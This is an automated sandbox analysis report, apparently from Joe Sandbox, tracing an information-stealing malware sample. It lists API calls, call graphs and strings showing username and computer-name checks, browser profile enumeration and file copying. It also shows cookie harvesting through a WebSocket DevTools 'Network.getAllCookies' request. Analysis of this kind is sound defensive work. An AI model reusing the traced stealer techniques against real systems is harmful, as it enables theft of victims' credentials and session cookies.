4122f4 2 API calls 15287->15289 15288->15287 15289->15285 15291 4125e8 15290->15291 15292 41260e 15290->15292 15293 412613 ??2@YAPAXI 15291->15293 15294 4125ef 15291->15294 15292->15281 15293->15281 15295 4125f4 ??2@YAPAXI 15294->15295 15296 41261f 15294->15296 15295->15281 15297 420dde Concurrency::cancel_current_task RaiseException 15296->15297 15297->15296 15299 412302 15298->15299 15300 41231b ??3@YAXPAX 15298->15300 15301 412327 _invalid_parameter_noinfo_noreturn 15299->15301 15302 412319 15299->15302 15300->15282 15302->15300 15315 420e92 15303->15315 15306 420f5e Concurrency::cancel_current_task RaiseException 15307 420e3a 15306->15307 15318 420d34 15307->15318 15330 420e56 15310->15330 15313 420f5e Concurrency::cancel_current_task RaiseException 15314 420e1a 15313->15314 15321 420cfd 15315->15321 15319 420edc ___std_exception_copy 3 API calls 15318->15319 15320 420d57 15319->15320 15320->15263 15324 420edc 15321->15324 15325 420d29 15324->15325 15326 420ee9 15324->15326 15325->15306 15326->15325 15327 420ef9 malloc 15326->15327 15328 420f26 free 15327->15328 15329 420f0d strcpy_s 15327->15329 15328->15325 15329->15328 15331 420cfd std::exception::exception 3 API calls 15330->15331 15332 420e0c 15331->15332 15332->15313 15334 412d75 15333->15334 15335 420dfb 4 API calls 15334->15335 15336 412d7f 15335->15336 15338 412b0e 15337->15338 15339 4127fe 15337->15339 15342 412528 8 API calls 15338->15342 15340 412b13 15339->15340 15341 412814 15339->15341 15345 412528 8 API calls 15340->15345 15343 41283d 15341->15343 15344 412b1c 15341->15344 15342->15340 15347 412853 15343->15347 15349 412464 9 API calls 15343->15349 15346 412538 8 API calls 15344->15346 15345->15344 15348 412b21 15346->15348 15350 412893 15347->15350 15351 412866 15347->15351 15349->15347 15352 412908 15350->15352 15355 4128a4 15350->15355 15353 412af1 15351->15353 15362 412976 memmove 15351->15362 15354 4129a0 15352->15354 15360 41291c 15352->15360 15353->15235 15358 4129b2 15354->15358 15359 412a49 15354->15359 15356 4128b8 memmove 15355->15356 15357 4128d7 15355->15357 15356->15357 15357->15353 15369 41298c memcpy 15357->15369 15363 412a93 15358->15363 15364 4129ba 15358->15364 15365 412a5a memmove 15359->15365 15372 412949 15359->15372 15361 412930 memmove 15360->15361 15360->15372 15361->15372 15362->15353 15367 412aa9 memmove 15363->15367 15363->15372 15366 4129f9 15364->15366 15370 4129d3 memmove 15364->15370 15365->15372 15371 412a0a memmove 15366->15371 15366->15372 15367->15372 15368 412ae5 memmove 15368->15353 15369->15353 15370->15366 15371->15372 15372->15353 15372->15368 15374 4123e1 15373->15374 15375 41245c 15373->15375 15377 412432 15374->15377 15378 4123ee 15374->15378 15376 412528 8 API calls 15375->15376 15380 412463 15376->15380 15377->15375 15381 412438 15377->15381 15379 412464 9 API calls 15378->15379 15387 4123f8 15379->15387 15382 4124be 15380->15382 15383 41246e 15380->15383 15395 4124c4 15381->15395 15389 412538 8 API calls 15382->15389 15385 412480 15383->15385 15386 412475 15383->15386 15392 41247e 15385->15392 15394 4122aa 3 API calls 15385->15394 15390 412548 5 API calls 15386->15390 15388 41241f 15387->15388 15393 412412 memcpy 15387->15393 15388->15248 15391 4124c3 15389->15391 15390->15392 15392->15248 15393->15388 15394->15392 15396 412520 15395->15396 15400 4124d6 15395->15400 15397 412528 8 API calls 15396->15397 15399 412527 15397->15399 15398 412505 15398->15388 15400->15398 15401 4124f4 memmove 15400->15401 15401->15398 15402 4010b0 memset memset 15403 4010f9 lstrcatA 15402->15403 15404 4010e9 15402->15404 15405 40111e lstrcatA 15403->15405 15406 40110e 15403->15406 15404->15403 15407 401143 lstrcatA 15405->15407 15408 401133 15405->15408 15406->15405 15409 401168 lstrcatA 15407->15409 15410 401158 15407->15410 15408->15407 15411 40118d lstrcatA lstrcatA 15409->15411 15412 40117d 15409->15412 15410->15409 15413 4011bc lstrcatA 15411->15413 15414 4011ac 15411->15414 15412->15411 15415 4011e1 lstrcatA 15413->15415 15416 4011d1 15413->15416 15414->15413 15417 401206 lstrcatA 15415->15417 15418 4011f6 15415->15418 15416->15415 15419 40122b lstrcatA 15417->15419 15420 40121b 15417->15420 15418->15417 15421 401250 lstrcatA lstrcatA 15419->15421 15422 401240 15419->15422 15420->15419 15423 401279 lstrcatA 15421->15423 15424 401269 15421->15424 15422->15421 15432 413dbf GetProcessHeap HeapAlloc GetComputerNameA 15423->15432 15424->15423 15426 40128a strcmp 15427 401298 15426->15427 15428 4012ab 15426->15428 15433 413d91 GetProcessHeap HeapAlloc GetUserNameA 15427->15433 15430 40129d strcmp 15430->15428 15431 4012b6 ExitProcess 15430->15431 15432->15426 15433->15430 15442 4022b8 15444 4022d4 15442->15444 15443 413740 lstrcpyA 15443->15444 15444->15443 15446 4023a5 15444->15446 15457 401825 15444->15457 15447 413740 lstrcpyA 15446->15447 15448 4023b9 15447->15448 15449 413740 lstrcpyA 15448->15449 15450 4023c8 15449->15450 15451 413740 lstrcpyA 15450->15451 15452 4023d7 15451->15452 15453 413740 lstrcpyA 15452->15453 15454 4023ed 15453->15454 15522 4014c8 memset 15454->15522 15456 40240a 15458 41370e lstrcpyA 15457->15458 15459 401842 15458->15459 15460 41370e lstrcpyA 15459->15460 15461 40184e 15460->15461 15475 40189e 15461->15475 15570 414ae0 SHGetFolderPathA 15461->15570 15463 4018b9 15466 413806 2 API calls 15463->15466 15464 40196c 15467 413806 2 API calls 15464->15467 15469 4018cc 15466->15469 15470 40197f 15467->15470 15468 413806 2 API calls 15471 401896 15468->15471 15473 413860 3 API calls 15469->15473 15474 413860 3 API calls 15470->15474 15472 4137c0 lstrcpyA 15471->15472 15472->15475 15476 4018f6 15473->15476 15477 4019aa 15474->15477 15475->15463 15475->15464 15478 413806 2 API calls 15476->15478 15479 413806 2 API calls 15477->15479 15480 401908 15478->15480 15481 4019b9 15479->15481 15484 413860 3 API calls 15480->15484 15482 413860 3 API calls 15481->15482 15483 4019c8 15482->15483 15485 413806 2 API calls 15483->15485 15486 401942 15484->15486 15487 4019da 15485->15487 15488 4137c0 lstrcpyA 15486->15488 15489 4137c0 lstrcpyA 15487->15489 15490 40194e 15488->15490 15489->15490 15491 401a1c FindFirstFileA 15490->15491 15496 402237 15491->15496 15507 401a2f 15491->15507 15492 402207 FindNextFileA 15493 40221d FindClose 15492->15493 15492->15507 15494 40222c 15493->15494 15494->15496 15495 41370e lstrcpyA 15495->15507 15497 413740 lstrcpyA 15497->15507 15498 414ab3 GetFileAttributesA 15498->15507 15499 401b9f FindFirstFileA 15499->15496 15515 401af8 15499->15515 15500 413806 lstrcpyA lstrcatA 15500->15507 15501 413860 lstrlenA lstrcpyA lstrcatA 15501->15507 15502 4137c0 lstrcpyA 15502->15507 15503 414ab3 GetFileAttributesA 15503->15515 15504 401e83 FindNextFileA 15506 401ea1 FindClose 15504->15506 15504->15515 15505 41370e lstrcpyA 15505->15515 15506->15515 15507->15492 15507->15495 15507->15497 15507->15498 15507->15500 15507->15501 15507->15502 15507->15515 15508 4148f3 lstrcpyA lstrcpyA GetSystemTime lstrlenA 15508->15515 15509 413860 lstrlenA lstrcpyA lstrcatA 15509->15515 15510 4137c0 lstrcpyA 15510->15515 15511 4020ee CopyFileA 15513 413740 lstrcpyA 15511->15513 15512 413806 lstrcpyA lstrcatA 15512->15515 15513->15515 15514 4021cf DeleteFileA 15514->15515 15515->15492 15515->15499 15515->15503 15515->15504 15515->15505 15515->15508 15515->15509 15515->15510 15515->15511 15515->15512 15515->15514 15516 401d7e CopyFileA 15515->15516 15518 40ae6d 6 API calls 15515->15518 15519 401e56 DeleteFileA 15515->15519 15520 413740 lstrcpyA 15515->15520 15521 41797d 116 API calls 15515->15521 15517 413740 lstrcpyA 15516->15517 15517->15515 15518->15515 15519->15515 15520->15515 15521->15515 15523 4014f3 15522->15523 15573 401458 GetProcessHeap HeapAlloc RegOpenKeyExA 15523->15573 15525 40157c lstrcatA lstrlenA 15526 401590 15525->15526 15529 4017fc 15525->15529 15527 41370e lstrcpyA 15526->15527 15528 4015cf 15527->15528 15530 413860 3 API calls 15528->15530 15529->15456 15531 4015e0 15530->15531 15532 413860 3 API calls 15531->15532 15533 40163f 15532->15533 15534 4137c0 lstrcpyA 15533->15534 15535 401648 15534->15535 15536 41370e lstrcpyA 15535->15536 15537 401665 15536->15537 15538 413860 3 API calls 15537->15538 15539 401676 15538->15539 15540 413806 2 API calls 15539->15540 15541 401688 15540->15541 15543 413860 3 API calls 15541->15543 15544 4016b2 15543->15544 15545 4148f3 4 API calls 15544->15545 15546 4016bd 15545->15546 15547 413806 2 API calls 15546->15547 15548 4016c9 15547->15548 15549 4137c0 lstrcpyA 15548->15549 15550 4016d2 15549->15550 15551 401705 CopyFileA 15550->15551 15552 413740 lstrcpyA 15551->15552 15553 401723 15552->15553 15554 40ae6d 6 API calls 15553->15554 15555 401731 15554->15555 15556 4017bd 15555->15556 15557 413740 lstrcpyA 15555->15557 15558 4017d7 DeleteFileA 15556->15558 15559 401759 15557->15559 15566 4017e1 15558->15566 15560 413740 lstrcpyA 15559->15560 15561 401765 15560->15561 15562 413740 lstrcpyA 15561->15562 15563 401771 15562->15563 15564 413740 lstrcpyA 15563->15564 15565 40177c 15564->15565 15567 413740 lstrcpyA 15565->15567 15566->15529 15568 401792 15567->15568 15569 41797d 116 API calls 15568->15569 15569->15556 15571 41370e lstrcpyA 15570->15571 15572 401884 15571->15572 15572->15468 15574 4014b3 RegCloseKey 15573->15574 15575 40149d RegQueryValueExA 15573->15575 15574->15525 15575->15574

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 0040996B Relevance: 62.1, APIs: 28, Strings: 7, Instructions: 841networkstringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 004123CA: memcpy.MSVCRT(?,00000010,?,?,?,?,00412388,?,?,?,?,?,?,0041234F,?,00000000), ref: 00412417
                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00409BFB
                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00409C0B
                                                                                                                                                                                                                                                  • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 00409C67
                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00409C72
                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 00409C78
                                                                                                                                                                                                                                                  • htons.WS2_32(00000000), ref: 00409CEB
                                                                                                                                                                                                                                                  • freeaddrinfo.WS2_32(?,?,?,?,00000005,00000001), ref: 00409D03
                                                                                                                                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00409D0D
                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00409DBF
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?), ref: 00409E5D
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 00409EC4
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006439EB,00403BD8), ref: 00409F4C
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 00409FB3
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$CleanupStartupclosesocketconnectfreeaddrinfogetaddrinfohtonsmemcpysocketstrlen
                                                                                                                                                                                                                                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$GET $ws://${"id":1,"method":"Network.getAllCookies"}
                                                                                                                                                                                                                                                  • API String ID: 1979669111-4236195153
                                                                                                                                                                                                                                                  • Opcode ID: 4715123e443adf7437ec88137ba1ca19ecd170733144086bc0f98247ced9646a
                                                                                                                                                                                                                                                  • Instruction ID: 3f74030779492602d4843865c2cca9a124e88548bb3c48b38f5ca924778076b7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4715123e443adf7437ec88137ba1ca19ecd170733144086bc0f98247ced9646a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA72EF706083809FD324DF24C845BABBBE5BF91304F44492EE0D9973D2DBB89949CB5A
                                                                                                                                                                                                                                                  Function 0040B942 Relevance: 59.1, APIs: 23, Strings: 10, Instructions: 1344filestringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 945 40b942-40b979 call 41370e call 413806 950 40b992-40b9fd call 413860 call 4137c0 call 413770 * 2 call 41370e * 2 call 41398e FindFirstFileA 945->950 951 40b97b-40b98b 945->951 966 40ba03-40ba28 950->966 967 40cc7d-40ccee call 413770 * 12 950->967 951->950 968 40ba2b-40ba32 966->968 970 40ba44-40ba59 968->970 971 40ba34-40ba3d 968->971 977 40c27a-40c289 FindNextFileA 970->977 978 40ba5f-40ba66 970->978 971->970 977->968 980 40c28f 977->980 981 40ba68-40ba78 978->981 982 40ba7f-40ba94 978->982 984 40cc6e-40cc7a FindClose 980->984 981->982 982->977 987 40ba9a-40babc call 413778 call 413806 982->987 984->967 997 40bace-40bb1d call 413860 * 2 call 4137c0 call 413770 * 3 987->997 998 40babe-40bac7 987->998 1022 40bb85-40bb8c 997->1022 1023 40bb1f-40bb31 call 41398e 997->1023 998->997 1025 40bb9e 1022->1025 1026 40bb8e-40bb97 1022->1026 1030 40bb51-40bb62 StrCmpCA 1023->1030 1031 40bb33-40bb4a 1023->1031 1027 40bba1-40bbff call 413860 * 4 call 4137c0 call 413770 * 3 1025->1027 1026->1025 1067 40bc84-40bca1 call 413770 call 41398e 1027->1067 1033 40bc04-40bc0b 1030->1033 1034 40bb68-40bb6f 1030->1034 1031->1030 1035 40bc1d-40bc81 call 413860 * 4 call 4137c0 call 413770 * 3 1033->1035 1036 40bc0d-40bc16 1033->1036 1038 40bb81-40bb83 1034->1038 1039 40bb71-40bb7a 1034->1039 1035->1067 1036->1035 1038->1027 1039->1038 1074 40bca3-40bcb6 1067->1074 1075 40bcbd-40bcd3 StrCmpCA 1067->1075 1074->1075 1076 40bcd9-40bce0 1075->1076 1077 40bf4a-40bf59 StrCmpCA 1075->1077 1078 40bce2-40bcfc 1076->1078 1079 40bd03-40bd12 1076->1079 1080 40c0b8-40c15d call 413740 * 7 call 40b4f3 1077->1080 1081 40bf5f-40bf6e StrCmpCA 1077->1081 1078->1079 1079->1077 1089 40bd18-40bd4a call 41370e call 413860 call 413806 1079->1089 1210 40c162 1080->1210 1083 40c294-40c2ae call 41398e StrCmpCA 1081->1083 1084 40bf74-40bf8e call 413740 call 414ab3 1081->1084 1093 40c2b4-40c2ba 1083->1093 1094 40c165-40c16c 1083->1094 1109 40bf94-40bf9a 1084->1109 1110 40c4c7-40c4dc StrCmpCA 1084->1110 1145 40bd5c-40be02 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 call 41370e call 413860 1089->1145 1146 40bd4c-40bd55 1089->1146 1093->1094 1098 40c2c0-40c2ca 1093->1098 1099 40c262-40c274 call 41395a * 2 1094->1099 1100 40c172-40c25a call 413740 * 4 call 41370e call 413740 * 4 call 40b942 1094->1100 1104 40c2d0-40c2e5 1098->1104 1105 40cb14-40cb55 memset call 41398e lstrcatA call 41398e lstrcatA 1098->1105 1099->977 1280 40c25f 1100->1280 1104->977 1112 40c2e7-40c319 call 41370e call 413860 call 413806 1104->1112 1159 40cb57-40cb63 1105->1159 1160 40cb99-40cc27 call 41398e * 3 call 413740 * 4 1105->1160 1109->1094 1116 40bfa0-40bfaa 1109->1116 1119 40c4e2-40c4f1 StrCmpCA 1110->1119 1120 40c7e5-40c817 call 41370e call 413860 call 413806 1110->1120 1185 40c32b-40c386 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 1112->1185 1186 40c31b-40c324 1112->1186 1125 40bfb0-40bfc5 1116->1125 1126 40c6d2-40c713 memset call 41398e lstrcatA call 41398e lstrcatA 1116->1126 1119->1094 1130 40c4f7-40c529 call 41370e call 413860 call 413806 1119->1130 1181 40c829-40c8b9 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA call 413740 call 40ae6d 1120->1181 1182 40c819-40c822 1120->1182 1125->977 1137 40bfcb-40bffd call 41370e call 413860 call 413806 1125->1137 1177 40c715-40c721 1126->1177 1178 40c757-40c7e0 call 41398e * 2 call 413740 * 4 1126->1178 1194 40c53b-40c5b7 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA 1130->1194 1195 40c52b-40c534 1130->1195 1211 40c00f-40c076 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e 1137->1211 1212 40bfff-40c008 1137->1212 1359 40be04 1145->1359 1360 40be2b-40be77 call 413860 call 4137c0 call 413770 * 2 call 413740 call 40ae6d 1145->1360 1146->1145 1161 40cb68-40cb8a 1159->1161 1300 40cc2a-40cc3c call 40ab8f 1160->1300 1161->1161 1170 40cb8c-40cb93 1161->1170 1170->1160 1189 40c726-40c748 1177->1189 1178->1300 1374 40c8be-40c8c2 1181->1374 1182->1181 1330 40c38b-40c3ae call 41398e * 2 CopyFileA 1185->1330 1186->1185 1189->1189 1200 40c74a-40c751 1189->1200 1356 40c9e0-40c9f2 call 41398e DeleteFileA call 41395a 1194->1356 1357 40c5bd-40c5d9 call 413740 call 40ae6d 1194->1357 1195->1194 1200->1178 1210->1094 1348 40c079-40c088 call 41398e CopyFileA 1211->1348 1212->1211 1280->1099 1312 40cc41 1300->1312 1312->1210 1351 40c3b0-40c3d4 call 413740 call 415071 Sleep 1330->1351 1352 40c3e5-40c410 call 413740 call 40ae6d 1330->1352 1369 40ca03-40ca2e call 413740 call 40ae6d 1348->1369 1370 40c08e-40c0b6 call 413740 call 415071 call 41398e 1348->1370 1351->1330 1397 40c3d6-40c3e0 call 4137c0 1351->1397 1400 40cc62 1352->1400 1401 40c416-40c426 1352->1401 1384 40c9f7-40c9fe call 413770 1356->1384 1387 40c5de-40c5e2 1357->1387 1368 40be09-40be1c 1359->1368 1460 40bf15-40bf44 call 41398e DeleteFileA call 41395a call 41398e call 413770 * 2 1360->1460 1461 40be7d-40bf10 call 413740 * 5 call 41797d call 413770 1360->1461 1368->1368 1379 40be1e-40be28 1368->1379 1417 40ca34-40ca44 1369->1417 1418 40cc46-40cc4f 1369->1418 1370->1348 1374->1356 1375 40c8c8-40c8d8 1374->1375 1385 40c8ea-40c920 call 413860 call 413806 1375->1385 1386 40c8da-40c8e3 1375->1386 1379->1360 1384->1094 1430 40c922-40c93c 1385->1430 1431 40c943-40c9a7 call 413860 call 413740 * 4 1385->1431 1386->1385 1387->1356 1395 40c5e8-40c5f8 1387->1395 1406 40c60a-40c640 call 413860 call 413806 1395->1406 1407 40c5fa-40c603 1395->1407 1397->1352 1400->984 1402 40c428-40c442 1401->1402 1403 40c449-40c463 1401->1403 1402->1403 1413 40c469-40c4c2 call 413740 * 4 1403->1413 1414 40c464 call 413860 1403->1414 1444 40c642-40c65c 1406->1444 1445 40c663-40c6cd call 413860 call 413740 * 4 1406->1445 1407->1406 1472 40cae0-40cb0f call 41797d call 413770 1413->1472 1414->1413 1424 40ca46-40ca60 1417->1424 1425 40ca67-40cada call 413860 call 413740 * 4 1417->1425 1423 40cc55-40cc5d call 413770 1418->1423 1424->1425 1425->1472 1430->1431 1493 40c9ad-40c9da call 41797d call 413770 * 3 1431->1493 1444->1445 1445->1493 1460->1077 1461->1460 1472->1423 1493->1356
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,0042EEFC,0042EEFC,?,?,00643AFF,?,?,0042EEFC), ref: 0040B9F2
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 0040BF23
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040BF51
                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?), ref: 0040C281
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C084
                                                                                                                                                                                                                                                    • Part of subcall function 00415071: OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041512A
                                                                                                                                                                                                                                                    • Part of subcall function 00415071: TerminateProcess.KERNEL32(00000000,00000000), ref: 00415139
                                                                                                                                                                                                                                                    • Part of subcall function 00415071: CloseHandle.KERNEL32(00000000), ref: 00415140
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: CreateFileA.KERNEL32 ref: 0040B634
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 0040C4D4
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040C4E9
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C5AE
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C6DA
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?), ref: 0040C6F5
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040C70A
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C89C
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 0040C9EE
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040BF66
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,?,?,?,?,00643A71,?,?,0042EEFC), ref: 0040BB57
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Brave,?,?,?,00643A71,?,?,00643A71,?,?,?,?,00643A71,?,?), ref: 0040BCC3
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040CC74
                                                                                                                                                                                                                                                    • Part of subcall function 0040B942: StrCmpCA.SHLWAPI(00000000,00632B48), ref: 0040C2AA
                                                                                                                                                                                                                                                    • Part of subcall function 0040B942: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C3AA
                                                                                                                                                                                                                                                    • Part of subcall function 0040B942: Sleep.KERNEL32(000003E8,?), ref: 0040C3CD
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalFree.KERNEL32(EC8350EC), ref: 0040AF18
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040CB1C
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040CB37
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040CB4C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
